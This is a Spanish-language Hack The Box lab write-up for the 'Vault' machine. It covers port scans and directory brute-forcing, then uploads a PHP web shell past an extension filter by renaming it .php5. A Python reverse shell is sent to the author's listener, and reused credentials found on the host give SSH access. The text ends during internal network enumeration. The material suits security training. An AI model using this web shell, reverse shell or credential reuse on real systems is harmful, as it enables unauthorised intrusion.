30 minutes
HTB write-up: Vault
Sin duda me gusto mucho esta maquina. Bypass de filtros por nombre, VPN sobre SSH, proxychains y muchos túneles mágicos.
Machine info
La información que tenemos de la máquina es:
Name | Maker | OS | IP Address |
---|---|---|---|
vault | nol0gz | Linux | 10.10.10.109 |
Su tarjeta de presentación es:
Port Scanning
Iniciamos por ejecutar un nmap
y un masscan
para identificar puertos udp y tcp abiertos:
root@laptop:~# nmap -sS -p- -n --open -v 10.10.10.109
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-26 23:29 CST
Initiating Ping Scan at 23:29
Scanning 10.10.10.109 [4 ports]
Completed Ping Scan at 23:29, 0.42s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 23:29
Scanning 10.10.10.109 [65535 ports]
Discovered open port 22/tcp on 10.10.10.109
Discovered open port 80/tcp on 10.10.10.109
SYN Stealth Scan Timing: About 28.21% done; ETC: 23:30 (0:01:19 remaining)
SYN Stealth Scan Timing: About 38.31% done; ETC: 23:31 (0:01:38 remaining)
Completed SYN Stealth Scan at 23:31, 135.50s elapsed (65535 total ports)
Nmap scan report for 10.10.10.109
Host is up (0.21s latency).
Not shown: 56653 closed ports, 8880 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 136.10 seconds
Raw packets sent: 121692 (5.354MB) | Rcvd: 84813 (3.393MB)
-sS
para escaneo TCP vía SYN-p-
para todos los puertos TCP--open
para que solo me muestre resultados de puertos abiertos-n
para no ejecutar resoluciones-v
para modo verboso
Doble check con masscan
:
root@laptop:~# masscan -e tun0 -p0-65535,U:0-65535 --rate 500 10.10.10.109
Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2019-02-27 04:25:11 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131072 ports/host]
Discovered open port 22/tcp on 10.10.10.109
Discovered open port 80/tcp on 10.10.10.109
-e tun0
para ejecutarlo nada mas en la interface tun0-p0-65535,U:0-65535
TODOS los puertos (TCP y UDP)--rate 500
para mandar 500pps y no sobre cargar la VPN ):
Como podemos ver los puertos son los mismos, por lo que iniciamos por identificar los servicios nuevamente con nmap
.
Services Identification
Lanzamos nmap
con los parámetros habituales para la identificación (-sC -sV):
root@laptop:~# nmap -sV -sC -p80,22 -n 10.10.10.109 --script discovery
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-26 23:33 CST
Nmap scan report for 10.10.10.109
Host is up (0.20s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
|_banner: SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.4
| ssh-hostkey:
| 2048 a6:9d:0f:7d:73:75:bb:a8:94:0a:b7:e3:fe:1f:24:f4 (RSA)
| 256 2c:7c:34:eb:3a:eb:04:03:ac:48:28:54:09:74:3d:27 (ECDSA)
|_ 256 98:42:5f:ad:87:22:92:6d:72:e6:66:6c:82:c1:09:83 (ED25519)
| ssh2-enum-algos:
| kex_algorithms: (6)
| server_host_key_algorithms: (5)
| encryption_algorithms: (6)
| mac_algorithms: (10)
|_ compression_algorithms: (2)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-chrono: Request times for /; avg: 455.26ms; min: 410.22ms; max: 522.30ms
| http-headers:
| Date: Wed, 27 Feb 2019 05:34:13 GMT
| Server: Apache/2.4.18 (Ubuntu)
| Connection: close
| Content-Type: text/html; charset=UTF-8
|
|_ (Request type: HEAD)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 338.50 seconds
-sC
para que ejecute los scripts safe-discovery de nse-sV
para que me traiga el banner del puerto-p80,22
para unicamente los puertos TCP/22 y TCP/80-n
para no ejecutar resoluciones--script discovery
para ejecutar los NSE clasificados en discovery (and not safe, que es el por defecto)
Como podemos ver tenemos un Servidor apache 2.4.18 y un servidor openssh 7.2.p2. Continuemos por navegar por el servidor web.
httpie to / and beyond
Veamos que tenemos en el home del servidor web:
xbytemx@laptop:~/htb/vault$ http http://10.10.10.109/index.php
HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Encoding: gzip
Content-Length: 215
Content-Type: text/html; charset=UTF-8
Date: Tue, 05 Mar 2019 06:56:43 GMT
Keep-Alive: timeout=5, max=100
Server: Apache/2.4.18 (Ubuntu)
Vary: Accept-Encoding
<b>Welcome to the Slowdaddy web interface</b>
<p>
We specialise in providing financial orginisations with strong web and database solutions and we promise to keep your customers financial data safe.
<p>
We are proud to announce our first client: Sparklays
(Sparklays.com still under construction)
Nos indica que la pagina se encuentra en construcción, que se trata de una empresa que atiende al sector financiero y que su primer cliente es sparklays
.
Lo primero que intente fue cambiar el header para buscar la pagina en construcción, pero no tuve éxito:
xbytemx@laptop:~/htb/vault$ http 10.10.10.109 Host:sparklays.com
HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Encoding: gzip
Content-Length: 215
Content-Type: text/html; charset=UTF-8
Date: Tue, 05 Mar 2019 06:58:57 GMT
Keep-Alive: timeout=5, max=100
Server: Apache/2.4.18 (Ubuntu)
Vary: Accept-Encoding
<b>Welcome to the Slowdaddy web interface</b>
<p>
We specialise in providing financial orginisations with strong web and database solutions and we promise to keep your customers financial data safe.
<p>
We are proud to announce our first client: Sparklays
(Sparklays.com still under construction)
Continué lanzando un dirb
sobre home, pero no encontró resultados.
xbytemx@laptop:~/htb/vault$ dirb http://10.10.10.109/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Mar 6 08:58:33 2019
URL_BASE: http://10.10.10.109/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.109/ ----
+ http://10.10.10.109/index.php (CODE:200|SIZE:299)
+ http://10.10.10.109/server-status (CODE:403|SIZE:300)
-----------------
END_TIME: Sun Mar 6 09:22:23 2019
DOWNLOADED: 4612 - FOUND: 2
Apunte a la carpeta con el nombre del sitio y bang, un 301 y un 403 respectivamente:
xbytemx@laptop:~/htb/vault$ http http://10.10.10.109/sparklays
HTTP/1.1 301 Moved Permanently
Connection: Keep-Alive
Content-Length: 316
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 05 Mar 2019 07:01:37 GMT
Keep-Alive: timeout=5, max=100
Location: http://10.10.10.109/sparklays/
Server: Apache/2.4.18 (Ubuntu)
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://10.10.10.109/sparklays/">here</a>.</p>
<hr>
<address>Apache/2.4.18 (Ubuntu) Server at 10.10.10.109 Port 80</address>
</body></html>
xbytemx@laptop:~/htb/vault$ http http://10.10.10.109/sparklays/
HTTP/1.1 403 Forbidden
Connection: Keep-Alive
Content-Length: 297
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 05 Mar 2019 07:01:45 GMT
Keep-Alive: timeout=5, max=100
Server: Apache/2.4.18 (Ubuntu)
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /sparklays/
on this server.<br />
</p>
<hr>
<address>Apache/2.4.18 (Ubuntu) Server at 10.10.10.109 Port 80</address>
</body></html>
Lance un gobuster
sobre este directorio:
xbytemx@laptop:~/htb/vault$ ~/tools/gobuster -t 20 -x html,php,txt -u http://10.10.10.109/sparklays/ -w ~/git/SecLists/Discovery/Web-Content/common.txt
=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://10.10.10.109/sparklays/
[+] Threads : 20
[+] Wordlist : /home/xbytemx/git/SecLists/Discovery/Web-Content/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Extensions : html,php,txt
[+] Timeout : 10s
=====================================================
2019/03/05 00:56:57 Starting gobuster
=====================================================
/.hta (Status: 403)
/.hta.txt (Status: 403)
/.hta.html (Status: 403)
/.hta.php (Status: 403)
/.htaccess (Status: 403)
/.htaccess.html (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.html (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.txt (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.txt (Status: 403)
/admin.php (Status: 200)
/admin.php (Status: 200)
/design (Status: 301)
/login.php (Status: 200)
=====================================================
2019/03/05 01:00:23 Finished
=====================================================
-t 20
para indicar cuantos hilos o procesos en paralelo pueden funcionar (20 para no matarme en mi vpn)-x html,php,txt
para indicar las extensiones de los archivos que también me gustaría validar mientras se buscan carpetas-u http://10.10.10.109/sparklays/
para agregar la opción obligatoria que señala la url que recibirá los request-w ~/git/SecLists/Discovery/Web-Content/common.txt
para agregar la opción obligatoria que indica las palabras a probar
Encontramos una carpeta y 2 archivos: design, admin.php y login.php
Iniciemos validando admin.php:
xbytemx@laptop:~/htb/vault$ http http://10.10.10.109/sparklays/admin.php
HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Encoding: gzip
Content-Length: 312
Content-Type: text/html; charset=UTF-8
Date: Tue, 05 Mar 2019 15:31:54 GMT
Keep-Alive: timeout=5, max=100
Server: Apache/2.4.18 (Ubuntu)
Vary: Accept-Encoding
<div class="container">
<form action ="admin.php" method="GET">
<h2 class="form-signin-heading">Please Login</h2>
<div class="input-group">
<span class="input-group-addon" id="basic-addon1">username</span>
<input type="text" name="username" class="form-control" placeholder="username" required>
</div>
<label for="inputPassword" class="sr-only">Password</label>
<input type="password" name="password" id="inputPassword" class="form-control" placeholder="Password" required>
<button class="btn btn-lg btn-primary btn-block" type="submit">Login</button>
</form>
Parece que se trata de un form que acepta peticiones GET, probemos enviadole admin/admin:
xbytemx@laptop:~/htb/vault$ http 'http://10.10.10.109/sparklays/admin.php?username=admin&password=admin'
HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Encoding: gzip
Content-Length: 312
Content-Type: text/html; charset=UTF-8
Date: Tue, 05 Mar 2019 15:36:40 GMT
Keep-Alive: timeout=5, max=100
Server: Apache/2.4.18 (Ubuntu)
Vary: Accept-Encoding
<div class="container">
<form action ="admin.php" method="GET">
<h2 class="form-signin-heading">Please Login</h2>
<div class="input-group">
<span class="input-group-addon" id="basic-addon1">username</span>
<input type="text" name="username" class="form-control" placeholder="username" required>
</div>
<label for="inputPassword" class="sr-only">Password</label>
<input type="password" name="password" id="inputPassword" class="form-control" placeholder="Password" required>
<button class="btn btn-lg btn-primary btn-block" type="submit">Login</button>
</form>
Como podemos ver no pasa nada. De hecho si prestamos atención al botón, veremos que tampoco realiza alguna acción, por lo que marcare esto como trampa y continuare mi camino.
El siguiente archivo es login.php:
xbytemx@laptop:~/htb/vault$ http http://10.10.10.109/sparklays/login.php
HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 16
Content-Type: text/html; charset=UTF-8
Date: Tue, 05 Mar 2019 15:39:32 GMT
Keep-Alive: timeout=5, max=100
Server: Apache/2.4.18 (Ubuntu)
access denied
Directo y sin mas nos da un “access denied”. Como no conocemos o tenemos indicios de algún argumento, marcare esto como sin información y continuaré a siguiente, que es design.
En design hacemos las pruebas habituales y vemos un resultado muy parecido a sparklays:
xbytemx@laptop:~/htb/vault$ http http://10.10.10.109/sparklays/design
HTTP/1.1 301 Moved Permanently
Connection: Keep-Alive
Content-Length: 323
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 06 Apr 2019 15:41:56 GMT
Keep-Alive: timeout=5, max=100
Location: http://10.10.10.109/sparklays/design/
Server: Apache/2.4.18 (Ubuntu)
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://10.10.10.109/sparklays/design/">here</a>.</p>
<hr>
<address>Apache/2.4.18 (Ubuntu) Server at 10.10.10.109 Port 80</address>
</body></html>
xbytemx@laptop:~/htb/vault$ http http://10.10.10.109/sparklays/design/
HTTP/1.1 403 Forbidden
Connection: Keep-Alive
Content-Length: 304
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 06 Apr 2019 15:42:00 GMT
Keep-Alive: timeout=5, max=100
Server: Apache/2.4.18 (Ubuntu)
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /sparklays/design/
on this server.<br />
</p>
<hr>
<address>Apache/2.4.18 (Ubuntu) Server at 10.10.10.109 Port 80</address>
</body></html>
Usando gobuster
sobre este directorio:
xbytemx@laptop:~/htb/vault$ ~/tools/gobuster -t 20 -x html,php,txt -u http://10.10.10.109/sparklays/design/ -w ~/git/SecLists/Discovery/Web-Content/common.txt
=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://10.10.10.109/sparklays/design/
[+] Threads : 20
[+] Wordlist : /home/xbytemx/git/SecLists/Discovery/Web-Content/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Extensions : html,php,txt
[+] Timeout : 10s
=====================================================
2019/03/05 01:01:25 Starting gobuster
=====================================================
/.htaccess (Status: 403)
/.htaccess.html (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.txt (Status: 403)
/.hta (Status: 403)
/.hta.html (Status: 403)
/.hta.php (Status: 403)
/.hta.txt (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.html (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.txt (Status: 403)
/design.html (Status: 200)
/uploads (Status: 301)
=====================================================
2019/03/05 01:04:54 Finished
=====================================================
Las opciones se explican mas arriba
Como podemos ver, hemos encontrado un archivo y un directorio; uploads y design.html.
Comenzando ahora en su lugar por el directorio uploads y lanzando directamente un gobuster
:
xbytemx@laptop:~/htb/vault$ ~/tools/gobuster -t 20 -x html,php,txt -u http://10.10.10.109/sparklays/design/uploads/ -w ~/git/SecLists/Discovery/Web-Content/common.txt
=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://10.10.10.109/sparklays/design/uploads/
[+] Threads : 20
[+] Wordlist : /home/xbytemx/git/SecLists/Discovery/Web-Content/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Extensions : html,php,txt
[+] Timeout : 10s
=====================================================
2019/03/05 01:05:40 Starting gobuster
=====================================================
/.hta (Status: 403)
/.hta.html (Status: 403)
/.hta.php (Status: 403)
/.hta.txt (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.html (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.txt (Status: 403)
/.htaccess (Status: 403)
/.htaccess.txt (Status: 403)
/.htaccess.html (Status: 403)
/.htaccess.php (Status: 403)
=====================================================
2019/03/05 01:09:27 Finished
=====================================================
Las opciones se explican mas arriba
No encontramos nada.
Ahora si, pasemos al archivo design.html con un httpie
:
xbytemx@laptop:~/htb/vault$ http http://10.10.10.109/sparklays/design/design.html
HTTP/1.1 200 OK
Accept-Ranges: bytes
Connection: Keep-Alive
Content-Encoding: gzip
Content-Length: 85
Content-Type: text/html
Date: Tue, 05 Mar 2019 07:10:55 GMT
ETag: "48-56ff4d0d6e180-gzip"
Keep-Alive: timeout=5, max=100
Last-Modified: Sun, 01 Jul 2018 19:09:10 GMT
Server: Apache/2.4.18 (Ubuntu)
Vary: Accept-Encoding
<h1> Design Settings </h1>
<p>
<a href="changelogo.php">Change Logo</a>
Tenemos una referencia a un archivo que no encontramos por gobuster, sigamos el rastro:
xbytemx@laptop:~/htb/vault$ http http://10.10.10.109/sparklays/design/changelogo.php
HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Encoding: gzip
Content-Length: 310
Content-Type: text/html; charset=UTF-8
Date: Tue, 05 Mar 2019 07:11:07 GMT
Keep-Alive: timeout=5, max=100
Server: Apache/2.4.18 (Ubuntu)
Vary: Accept-Encoding
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Upload Your File</title>
</head>
<body>
<div id="container">
<form enctype="multipart/form-data" action="" method="post">
<label for="file">Choose a file to upload:</label>
<input id="file" type="file" name="file" /><br />
<input type="submit" value="upload file" name="submit" />
</form>
</div>
</body>
</html>
Tenemos un form para subir archivos, lo cual hace sentido con la carpeta uploads que encontramos anteriormente.
uploading a php shell
Subamos una pequeña shell de php:
xbytemx@laptop:~/htb/vault$ printf '<?php system($_GET["cmd"]); ?>' > miaushell.php
xbytemx@laptop:~/htb/vault$ http -v -f POST http://10.10.10.109/sparklays/design/changelogo.php file@miaushell.php submit="upload file"
POST /sparklays/design/changelogo.php HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Length: 277
Content-Type: multipart/form-data; boundary=b57e22e967ea0a137a14f5ef7de530d7
Host: 10.10.10.109
User-Agent: HTTPie/0.9.8
--b57e22e967ea0a137a14f5ef7de530d7
Content-Disposition: form-data; name="submit"
upload file
--b57e22e967ea0a137a14f5ef7de530d7
Content-Disposition: form-data; name="file"; filename="miaushell.php"
<?php system($_GET["cmd"]); ?>
--b57e22e967ea0a137a14f5ef7de530d7--
HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Encoding: gzip
Content-Length: 330
Content-Type: text/html; charset=UTF-8
Date: Tue, 05 Mar 2019 15:51:26 GMT
Keep-Alive: timeout=5, max=100
Server: Apache/2.4.18 (Ubuntu)
Vary: Accept-Encoding
sorry that file type is not allowed<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Upload Your File</title>
</head>
<body>
<div id="container">
<form enctype="multipart/form-data" action="" method="post">
<label for="file">Choose a file to upload:</label>
<input id="file" type="file" name="file" /><br />
<input type="submit" value="upload file" name="submit" />
</form>
</div>
</body>
</html>
Tendremos un mensaje de sorry that file type is not allowed ):
Probablemente se trate de algún filtro, por lo que revisando la mágica documentación, podremos ver que hay otras extensiones para php, como php5:
xbytemx@laptop:~/htb/vault$ printf '<?php system($_GET["cmd"]); ?>' > dgdfgdfgdfgd.php5
xbytemx@laptop:~/htb/vault$ http -v -f POST http://10.10.10.109/sparklays/design/changelogo.php file@dgdfgdfgdfgd.php5 submit="upload file"
POST /sparklays/design/changelogo.php HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Length: 281
Content-Type: multipart/form-data; boundary=8b2205f86044aa6650434c4bcb1c853b
Host: 10.10.10.109
User-Agent: HTTPie/0.9.8
--8b2205f86044aa6650434c4bcb1c853b
Content-Disposition: form-data; name="submit"
upload file
--8b2205f86044aa6650434c4bcb1c853b
Content-Disposition: form-data; name="file"; filename="dgdfgdfgdfgd.php5"
<?php system($_GET["cmd"]); ?>
--8b2205f86044aa6650434c4bcb1c853b--
HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Encoding: gzip
Content-Length: 334
Content-Type: text/html; charset=UTF-8
Date: Sun, 17 Mar 2019 07:41:14 GMT
Keep-Alive: timeout=5, max=100
Server: Apache/2.4.18 (Ubuntu)
Vary: Accept-Encoding
The file was uploaded successfully<br><br><!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Upload Your File</title>
</head>
<body>
<div id="container">
<form enctype="multipart/form-data" action="" method="post">
<label for="file">Choose a file to upload:</label>
<input id="file" type="file" name="file" /><br />
<input type="submit" value="upload file" name="submit" />
</form>
</div>
</body>
</html>
Ahora que hemos podido subir nuestra shell, veamos si podemos ejecutar comandos sobre ella:
xbytemx@laptop:~/htb/vault$ http "http://10.10.10.109/sparklays/design/uploads/dgdfgdfgdfgd.php5?cmd=uname"
HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 6
Content-Type: text/html; charset=UTF-8
Date: Sun, 17 Mar 2019 07:41:31 GMT
Keep-Alive: timeout=5, max=100
Server: Apache/2.4.18 (Ubuntu)
Linux
Excelente, ahora que podemos ejecutar comandos sobre el servidor, podemos llamar a una reverse shell para trabajar más a gusto:
Get a reverse shell as www-data
Para ejecutar mi reverse shell, use urlencode
para no morir con problemas de encoding durante la ejecución. También provee previamente si podía ejecutar python, con python --version
. Con esta validación y soporte de encoding, ejecutamos el siguiente comando:
xbytemx@laptop:~/htb/vault$ http "http://10.10.10.109/sparklays/design/uploads/dgdfgdfgdfgd.php5?cmd="$(urlencode "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.12.244\",3001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'")
En mi maquina, esperando por la conexión y posteriormente haciendo el upgrade de mi tty:
xbytemx@laptop:~/htb/vault$ ncat -vlnp 3001
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::3001
Ncat: Listening on 0.0.0.0:3001
Ncat: Connection from 10.10.10.109.
Ncat: Connection from 10.10.10.109:41708.
/bin/sh: 0: can't access tty; job control turned off
$
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@ubuntu:/var/www/html/sparklays/design/uploads$
Ahora que estamos dentro, busquemos en la carpeta home por mas información sobre la maquina:
www-data@ubuntu:/var/www/html/sparklays/design/uploads$ cd /home
cd /home
www-data@ubuntu:/home$ ls -lah
ls -lah
total 16K
drwxr-xr-x 4 root root 4.0K Jul 17 2018 .
drwxr-xr-x 24 root root 4.0K Jul 17 2018 ..
drwxr-xr-x 19 alex alex 4.0K Nov 4 07:18 alex
drwxr-xr-x 18 dave dave 4.0K Sep 3 2018 dave
privesc from www-data to user
Empecemos por dave:
www-data@ubuntu:/home$ cd dave
cd dave
www-data@ubuntu:/home/dave$ ls -lahR
ls -lahR
.:
total 124K
drwxr-xr-x 18 dave dave 4.0K Sep 3 2018 .
drwxr-xr-x 4 root root 4.0K Jul 17 2018 ..
-rw------- 1 dave dave 2.5K Sep 3 2018 .ICEauthority
-rw------- 1 dave dave 153 Sep 3 2018 .Xauthority
-rw------- 1 dave dave 38 Mar 17 00:25 .bash_history
-rw-r--r-- 1 dave dave 220 Jul 17 2018 .bash_logout
-rw-r--r-- 1 dave dave 3.7K Jul 17 2018 .bashrc
drwx------ 10 dave dave 4.0K Jul 24 2018 .cache
drwx------ 3 dave dave 4.0K Jul 17 2018 .compiz
drwx------ 15 dave dave 4.0K Jul 24 2018 .config
-rw-r--r-- 1 dave dave 25 Jul 17 2018 .dmrc
drwx------ 2 dave dave 4.0K Jul 17 2018 .gconf
drwx------ 3 dave dave 4.0K Sep 3 2018 .gnupg
drwx------ 3 dave dave 4.0K Jul 17 2018 .local
drwxrwxr-x 2 dave dave 4.0K Jul 24 2018 .nano
-rw-r--r-- 1 dave dave 655 Jul 17 2018 .profile
-rw-rw-r-- 1 dave dave 1.0K Jul 24 2018 .root.txt.swp
drwx------ 2 dave dave 4.0K Jul 17 2018 .ssh
-rw------- 1 dave dave 808 Sep 3 2018 .xsession-errors
-rw------- 1 dave dave 1.4K Sep 3 2018 .xsession-errors.old
drwxr-xr-x 2 dave dave 4.0K Sep 3 2018 Desktop
drwxr-xr-x 2 dave dave 4.0K Jul 17 2018 Documents
drwxr-xr-x 2 dave dave 4.0K Jul 17 2018 Downloads
drwxr-xr-x 2 dave dave 4.0K Jul 17 2018 Music
drwxr-xr-x 2 dave dave 4.0K Jul 17 2018 Pictures
drwxr-xr-x 2 dave dave 4.0K Jul 17 2018 Public
drwxr-xr-x 2 dave dave 4.0K Jul 17 2018 Templates
drwxr-xr-x 2 dave dave 4.0K Jul 17 2018 Videos
-rw-r--r-- 1 dave dave 8.8K Jul 17 2018 examples.desktop
ls: cannot open directory './.cache': Permission denied
ls: cannot open directory './.compiz': Permission denied
ls: cannot open directory './.config': Permission denied
ls: cannot open directory './.gconf': Permission denied
ls: cannot open directory './.gnupg': Permission denied
ls: cannot open directory './.local': Permission denied
./.nano:
total 8.0K
drwxrwxr-x 2 dave dave 4.0K Jul 24 2018 .
drwxr-xr-x 18 dave dave 4.0K Sep 3 2018 ..
ls: cannot open directory './.ssh': Permission denied
./Desktop:
total 20K
drwxr-xr-x 2 dave dave 4.0K Sep 3 2018 .
drwxr-xr-x 18 dave dave 4.0K Sep 3 2018 ..
-rw-rw-r-- 1 alex alex 74 Jul 17 2018 Servers
-rw-rw-r-- 1 alex alex 14 Jul 17 2018 key
-rw-rw-r-- 1 alex alex 20 Jul 17 2018 ssh
./Documents:
total 8.0K
drwxr-xr-x 2 dave dave 4.0K Jul 17 2018 .
drwxr-xr-x 18 dave dave 4.0K Sep 3 2018 ..
./Downloads:
total 8.0K
drwxr-xr-x 2 dave dave 4.0K Jul 17 2018 .
drwxr-xr-x 18 dave dave 4.0K Sep 3 2018 ..
./Music:
total 8.0K
drwxr-xr-x 2 dave dave 4.0K Jul 17 2018 .
drwxr-xr-x 18 dave dave 4.0K Sep 3 2018 ..
./Pictures:
total 8.0K
drwxr-xr-x 2 dave dave 4.0K Jul 17 2018 .
drwxr-xr-x 18 dave dave 4.0K Sep 3 2018 ..
./Public:
total 8.0K
drwxr-xr-x 2 dave dave 4.0K Jul 17 2018 .
drwxr-xr-x 18 dave dave 4.0K Sep 3 2018 ..
./Templates:
total 8.0K
drwxr-xr-x 2 dave dave 4.0K Jul 17 2018 .
drwxr-xr-x 18 dave dave 4.0K Sep 3 2018 ..
./Videos:
total 8.0K
drwxr-xr-x 2 dave dave 4.0K Jul 17 2018 .
drwxr-xr-x 18 dave dave 4.0K Sep 3 2018 ..
Esos archivos en Desktop se ven sospechosos, veamos que hay dentro:
www-data@ubuntu:/home/dave$ more Desktop/*
more Desktop/*
::::::::::::::
Desktop/Servers
::::::::::::::
DNS + Configurator - 192.168.122.4
Firewall - 192.168.122.5
The Vault - x
--More--(Next file: Desktop/key)
::::::::::::::
Desktop/key
::::::::::::::
itscominghome
--More--(Next file: Desktop/ssh)
::::::::::::::
Desktop/ssh
::::::::::::::
dave
Dav3therav3123
Parece que el archivo ssh tiene unas credenciales, probemos las credenciales en la maquina:
xbytemx@laptop:~/htb/vault$ ssh dave@10.10.10.109
dave@10.10.10.109's password:
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.13.0-45-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
222 packages can be updated.
47 updates are security updates.
Last login: Sun Mar 17 01:22:21 2019 from 10.10.14.33
dave@ubuntu:~$
Hemos pasado de www-data a dave.
creds: dave / Dav3therav3123
Enumerating ubuntu as dave
Ahora que hemos podido ingresar en ubuntu, y que los archivos encontrados nos indican la existencia de otras maquinas mediante su dirección IP (Servers), comencemos a enumerar para saber como llegar hasta estas. Ni dave ni alex tienen algún archivo user.txt.
Interfaces y rutas:
dave@ubuntu:~$ ip a s
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:50:56:b9:e9:d5 brd ff:ff:ff:ff:ff:ff
inet 10.10.10.109/24 brd 10.10.10.255 scope global ens33
valid_lft forever preferred_lft forever
inet6 dead:beef::250:56ff:feb9:e9d5/64 scope global mngtmpaddr dynamic
valid_lft 86235sec preferred_lft 14235sec
inet6 fe80::250:56ff:feb9:e9d5/64 scope link
valid_lft forever preferred_lft forever
3: virbr0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
link/ether fe:54:00:17:ab:49 brd ff:ff:ff:ff:ff:ff
inet 192.168.122.1/24 brd 192.168.122.255 scope global virbr0
valid_lft forever preferred_lft forever
4: virbr0-nic: <BROADCAST,MULTICAST> mtu 1500 qdisc pfifo_fast state DOWN group default qlen 1000
link/ether 52:54:00:ff:fd:68 brd ff:ff:ff:ff:ff:ff
5: vnet0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast master virbr0 state UNKNOWN group default qlen 1000
link/ether fe:54:00:3a:3b:d5 brd ff:ff:ff:ff:ff:ff
inet6 fe80::fc54:ff:fe3a:3bd5/64 scope link
valid_lft forever preferred_lft forever
6: vnet1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast master virbr0 state UNKNOWN group default qlen 1000
link/ether fe:54:00:e1:74:41 brd ff:ff:ff:ff:ff:ff
inet6 fe80::fc54:ff:fee1:7441/64 scope link
valid_lft forever preferred_lft forever
7: vnet2: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast master virbr0 state UNKNOWN group default qlen 1000
link/ether fe:54:00:c6:70:66 brd ff:ff:ff:ff:ff:ff
inet6 fe80::fc54:ff:fec6:7066/64 scope link
valid_lft forever preferred_lft forever
